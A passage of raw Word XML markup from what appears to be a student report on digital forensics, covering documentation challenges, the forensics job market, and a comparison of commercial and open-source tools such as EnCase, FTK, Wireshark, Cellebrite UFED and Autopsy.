          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Forensic experts often fail to record their work adequately, which impedes training and external reviews. This lack of documentation and knowledge sharing hampers the development of new digital forensic personnel and the forensic community as a whole [19].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ixujair10uzx" w:id="36"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Legal Practice Challenges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009E">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Some digital forensic officers either do not record their work or do not follow legal practices, which poses significant threats to the integrity of digital forensic investigations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009F">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_35imlvw5ivfw" w:id="37"/>
      <w:bookmarkEnd w:id="37"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">National and International Job Market</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A1">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Digital Forensics Market is poised for significant growth in the upcoming years, driven by increasing demand across various sectors like Government and Defense, BFSI, Telecom and IT, Retail, and Healthcare. The market segments include Computer Forensics, Network Forensics, Mobile Device Forensics, and Cloud Forensics. This growth is expected to occur globally, with notable contributions from regions such as North America (including the United States, Canada, and Mexico), Europe (Germany, UK, France, Italy, Russia, and Turkey), Asia-Pacific (China, Japan, Korea, India, Australia, Indonesia, Thailand, Philippines, Malaysia, and Vietnam), South America (Brazil, Argentina, Colombia), and the Middle East and Africa (Saudi Arabia, UAE, Egypt, Nigeria, and South Africa), all experiencing notable market expansion[28].</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_21ss5ehfk1ri" w:id="38"/>
      <w:bookmarkEnd w:id="38"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_k6tnl9xkx2d9" w:id="39"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Current State of Digital Forensic Tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A4">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Digital forensic tools have become essential in extracting and analyzing data from various digital devices. Commercial tools like Cellebrite and Forensic Toolkit (FTK) offer robust features for comprehensive data retrieval, while open-source tools such as Autopsy provide accessible alternatives with a broad range of functionalities. These tools cater to different aspects of digital forensics, including mobile forensics, computer forensics, and network analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A5">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_k6tnl9xkx2d9" w:id="39"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bcr5ay1wrrp" w:id="40"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Features and Capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A8">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Commercial tools like Cellebrite UFED specialize in mobile forensics, offering extensive device compatibility and user-friendly interfaces for efficient data extraction [35]. FTK is known for its high processing speed and advanced analysis capabilities, especially for large datasets. On the other hand, open-source tools like Autopsy, equipped with features like keyword searches and hash analysis, offer a cost-effective solution for digital investigations [36].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A9">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3o7ctsm1t2jo" w:id="41"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Evaluation of Open-source Tools Versus Commercial Tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AB">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open-source tools, being free and community-driven, are often preferred by organizations with budget constraints. They offer flexibility and customization but may lag in terms of user support and device compatibility compared to commercial counterparts. Commercial tools, although expensive, provide comprehensive support and advanced features, crucial for complex investigations. The choice between these tools depends on specific case requirements, budget, and technical expertise.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hhbtl8v1uj9r" w:id="42"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendation and Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AD">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Based on the review, it is recommended that organizations assess their specific needs and resources when choosing between open-source and commercial forensic tools. For extensive and complex investigations, commercial tools like Cellebrite and FTK are advisable due to their advanced features and support. However, for basic to medium-level investigations or when budget constraints exist, open-source tools like Autopsy are sufficient and offer significant capabilities.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ycutn8z7e6lb" w:id="43"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AF">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Digital forensics encompasses various categories, each with its specialized tools. Here are some popular digital forensics tools in key categories:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B0">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_keya126n5tvr" w:id="44"/>
      <w:bookmarkEnd w:id="44"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Computer Forensics</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_df1k011468wp" w:id="45"/>
      <w:bookmarkEnd w:id="45"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EnCase</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B3">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OpenText EnCase Forensic, not an open-source software, is renowned for its rapid evidence processing, up to 75% faster than competitors [29]. Its evidence formats are globally accepted in courts, and the software boasts superior efficiency with extensive automation capabilities. EnCase offers thorough disk-level analysis for in-depth investigations and supports a wide range of artifacts from multiple sources. It is compatible with various devices and integrates AI and ML technologies for advanced analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B4">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_lj4gsxpkcdy3" w:id="46"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FTK® Forensic Toolkit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B6">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The FTK® Forensic Toolkit, currently not an open-source software, a commercial digital investigation platform, specializes in generating complete forensic images of disks. It is capable of processing diverse data types, ranging from hard drive contents to data from mobile devices, network sources, and the Internet. It includes full-disk forensic imaging that efficiently processes and indexes data from multiple sources, along with an effective OCR engine. The toolkit excels in decryption and password recovery, supporting over 100+ applications and McAfee Drive Encryption. It also offers straightforward registry file parsing with interactive and reportable options, and a dedicated mobile data management tab for apps like WhatsApp and Facebook. Additionally, FTK® is capable of handling datasets from Apple file systems, including decryption of Filevault 2 and parsing AFF4 images. The software enhances data analysis with visualization tools like timelines and geolocations [30].</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_g97zmak0129o" w:id="47"/>
      <w:bookmarkEnd w:id="47"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Forensics</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_zkzlmoojhst" w:id="48"/>
      <w:bookmarkEnd w:id="48"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B9">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark is renowned as the world's most popular network protocol analyzer, widely used across various commercial and non-profit enterprises. Supported by the non-profit Wireshark Foundation, Wireshark is a free, open-source tool that has garnered a global user base of millions. It offers robust features for network analysis, making it a standard choice for many organizations [31].</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_osi8m5mpz7um" w:id="49"/>
      <w:bookmarkEnd w:id="49"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NetworkMiner</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BB">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Used for network monitoring and packet sniffing, it can reconstruct files transmitted over a network.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7est4c3lgp2c" w:id="50"/>
      <w:bookmarkEnd w:id="50"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mobile Device Forensics</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_kpbyrpjkztp1" w:id="51"/>
      <w:bookmarkEnd w:id="51"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cellebrite UFED</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BE">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cellebrite's UFED tools offer comprehensive digital evidence collection capabilities with broad device compatibility, allowing access to data from smartphones, drones, SIM cards, SD cards, GPS devices, and more. These tools ensure forensically sound collection, preserving data integrity and making evidence admissible in legal proceedings. They feature advanced collection methods, including full file system (FFS) and physical extractions, for accurate data retrieval [32].</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_peib1bq7zz0s" w:id="52"/>
      <w:bookmarkEnd w:id="52"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MSAB XRY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C0">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Allows for extraction and analysis of data from mobile devices, including deleted data recovery.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dxah1jq6yw5i" w:id="53"/>
      <w:bookmarkEnd w:id="53"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cloud Forensics</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bnsbjailp8al" w:id="54"/>
      <w:bookmarkEnd w:id="54"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Oxygen Forensics [33]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C3">
      <w:pPr>
        <w:ind w:left="2880" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Offers solutions for cloud data extraction and analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
